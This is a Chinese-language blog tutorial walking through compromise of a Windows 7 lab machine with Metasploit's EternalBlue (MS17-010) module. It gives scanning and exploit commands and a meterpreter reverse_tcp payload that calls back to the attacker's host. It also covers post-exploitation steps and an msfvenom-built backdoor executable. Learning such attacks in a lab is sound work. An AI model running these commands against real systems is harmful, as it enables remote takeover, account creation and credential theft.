利用Metasploit控制目标电脑(Win7_x64系统)
介绍
MSF,是The Metasploit Framework的简称。MSF是一个非常好用的渗透框架,里面集成了许多框架和工具;MSF高度模块化,即框架由多个module组成。进一步解释,是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新;metasploit涵盖了渗透测试中全过程,可以在这个框架下利用现有的Payload进行一系列的渗透测试。
MS17-010(永恒之蓝)漏洞简介
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。(从EternalBlue这个Exploit被影子经纪人公布到互联网上后,就成为了“明星”。在漏洞被发现的五月中,这个Exploit被多款恶意软件利用。包括肆虐的WannaCryp0t,无文件的勒索软件UIWIX和SMB蠕虫EternalRocks。EternalBlue(在微软的MS17-010中被修复)是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码)。
永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。
目录
1. 前提
2. 开启模块
3. 查找漏洞
4. 设置模块
5. 设置参数并开始攻击
6. 攻击成功及反馈
7. 获取靶机权限
8. 附加
1. 前提
①kali攻击机与Win7系统在同一局域网的同一网段上;
②能相互ping通。
Kali信息:
网卡使用VMnet8,通过物理机可知:
Win7信息:
测试下网络是否能ping通:
2. 开启模块
打开kali,利用msf框架进行渗透,先查看kali数据库是否开启:
service postgresql status
下图为没有开启,还可以设置postgresql,开机自启:
update-rc.d postgresql enable
3. 查找漏洞
首先使用namp对靶机(Win7系统)进行扫描,确定445端口是否开启;
4. 设置模块
打开metasploit搜索ms17-010;
①进入msfconsole (每次界面随机,不固定)
②初始化数据库 msfdb init
③下面直接查找漏洞ms17_010(永恒之蓝就是利用这个漏洞)。
关注两个:扫描漏洞 auxiliary/scanner/smb/smb_ms17_010;
漏洞利用 exploit/windows/smb/ms17_010_eternalblue;
5. 设置参数并开始攻击
选择漏洞验证扫描工具并设置参数;
①use auxiliary/scanner/smb/smb-ms17-010 利用扫描漏洞,开启模块
②show options:查看设置
③set rhost 靶机ip(192.168.137.140)
④exploit 运行
选择攻击模块并设置参数;
①use exploit/windows/smb/ms17_010_eternalblue //选择模块
②options //查看详细信息
③set payload windows/x64/meterpreter/reverse_tcp //选择荷载
④set rhost 靶机ip(Win7:192.168.137.140)
⑤set lhost 攻击机ip(kali:192.168.137.134)
6. 攻击成功及反馈
exploit //运行攻击
7. 获取靶机权限
①run getgui -e // 开启靶机3389端口(远程桌面用)
②查看系统信息、提权添加账户以及获取密码等
输入shell进入目标系统 shell
chcp 65001 //解决shell后windows终端乱码
sysconfig //查看靶机系统信息
附加:
当然还有一种方法对Windows系统进行渗透,即Windows操作系统下Meterpreter的使用。
① 生成一个被控端payload1.exe,再启动Metasploit
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.137.139 lport=5000 -f exe -o /root/payload1.exe
②成功启动Metasploit之后,执行以下命令,将生成的payload1复制到虚拟机Windows 7中,此时在主控端就可以打开一个Meterpreter控制会话(session)
③background命令可将当前会话切换到后台,就可以返回到上一级的模块控制处了;
sessions命令可显示所有的会话,以查看目标机的信息。
下面送上两张常用命令的图片
至此,两种方式对靶机已成功渗透。
希望能帮到大家,如果可以解决大家的小问题,麻烦点赞收藏加关注,若有问题评论区留言或私信我。
利用Metasploit控制目标电脑(Win7_x64系统)相关推荐
- 利用msf控制目标电脑
利用msf控制目标电脑 准备工作 永恒之蓝漏洞 msf简介 利用永恒之蓝漏洞攻击win7 准备工作 kali Linux虚拟机一台 win7虚拟机一台(要关闭防火墙和杀软的) 注意两台机器要连接到同一 ...
- 利用官方工具重装电脑Windows10系统(含下载链接)(亲测有效)
目录 废话不多说,让我们开始利用U盘重装windows10家庭版(×64) 一.U盘启动盘的制作: 二.利用U盘启动盘重装电脑系统: 三.重装系统后的基本设置: 微软官方Windows系统下载网址: ...
- 基于meanshift的手势跟踪与电脑鼠标控制(手势交互系统)
基于meanshift的手势跟踪与电脑鼠标控制(手势交互系统) zouxy09@qq.com http://blog.csdn.net/zouxy09 一年多前开始接触计算机视觉这个领域的时候,年幼无 ...
- [原]利用极域电子教室控制别人电脑
学校的极域电子教室程序及其烦人,上课的时候老师总是控制我们电脑,我一直想破解,所以发布了<[原]VC被控制时关闭极域电子教室.破解联想硬盘保护系统密码(上)>和<[原]VC被控制时关 ...
- 控制儿童在什么时段使用计算机,利用家长控制限制孩子使用电脑时间,让其只能学习不能玩游戏...
原标题:利用家长控制限制孩子使用电脑时间,让其只能学习不能玩游戏 小孩玩电脑是很没有节制的,其实Windows系统有一个家长控制,可以限制使用计算机的时段.可以玩的游戏类型以及可以运行的程序.下面我们 ...
- 远程计算机无法操作,Win10系统下qq远程不能控制对方电脑(点不动)的完全解决方法...
我们经常会使用到QQ远程功能,通过这个功能实现不上门,就可以操纵对方电脑,进行相关操作.但是对方使用的是Win10系统,你想要使用QQ远程控制对方的电脑,却发现连接之后却点不动任何东西,又或者是刚连接 ...
- 【控制】多智能体系统总结。1. 系统模型。2.控制目标。3.模型转换。
[控制]多智能体系统总结.1. 系统模型.2.控制目标.3.模型转换. [控制]多智能体系统总结.4.控制协议. [控制]多智能体系统总结.5.系统合并. 文章目录 1. 系统模型 1.1 一阶一维系 ...
- 实现内网(局域网)控制所有电脑一键关机并且系统还原的方案
公司有一个核心技术部门,有数据机密.隔天归零.灵活群控内网的特性,要求管理员可以对办公室做到集群控制的要求,于是最近在研究一套比较可行.稳定.简单方便的方案. 起初,有尝试过物理更改硬件,比如硬盘,但 ...
- 利用计算机本地文档重装系统,电脑如何用本地模式重装win10
电脑如何用本地模式重装win10系统?很多人都不了解本地模式究竟如何对电脑系统进行重装.其实只是利用韩博士装机大师中的本地模式进行下载PE镜像文件就可以对电脑进行重装系统.如果大家还没有试过用本地模式 ...
最新文章
- 从MATLAB帮助文档上学习 chirp
- HTTP权威指南记录 ---- HTTP概述
- 一个时间日期转换格式的小功能(Oracle)
- java 连接kafka_设置多个kafka连接接收器
- 使用Mule ESB与Groovy编排RESTful服务【转】很适合我们当前的架构
- js delete删除对象属性,delete删除不了变量及原型链中的变量
- org.springframework.dao.InvalidDataAccessApiUsageException
- noip2013——提高组——花匠(flower)
- 2020全球开源基础设施技术峰会分享 | 自研软硬一体化加速方案
- python 简历_用Python翻译我的简历
- 业务、架构、技术,我们应该关注什么 Java和.Net的优势劣势简单看法 市场经济决定,商业之道即是软件之道,市场的需求决定着软件技术的发展 利益决定着选择应用新技术...
- 为caffe添加最简单的全通层AllPassLayer
- Java编程题——简单下拉框二级联动
- Linux卸载打印机驱动,Ubuntu下安装打印机驱动(两种方法)
- 开放集识别的最新进展总结(源于Recent Advances in Open Set Recognition: A Survey)
- 如何选择物联网服务商
- linux搜狗输入法皮肤,Ubuntu 12.04下安装搜狗拼音 + 安装搜狗皮肤
- 软件测试工程师太累了?
- 华为linux系统安装包,一、Linux系统安装
- spark入门框架+python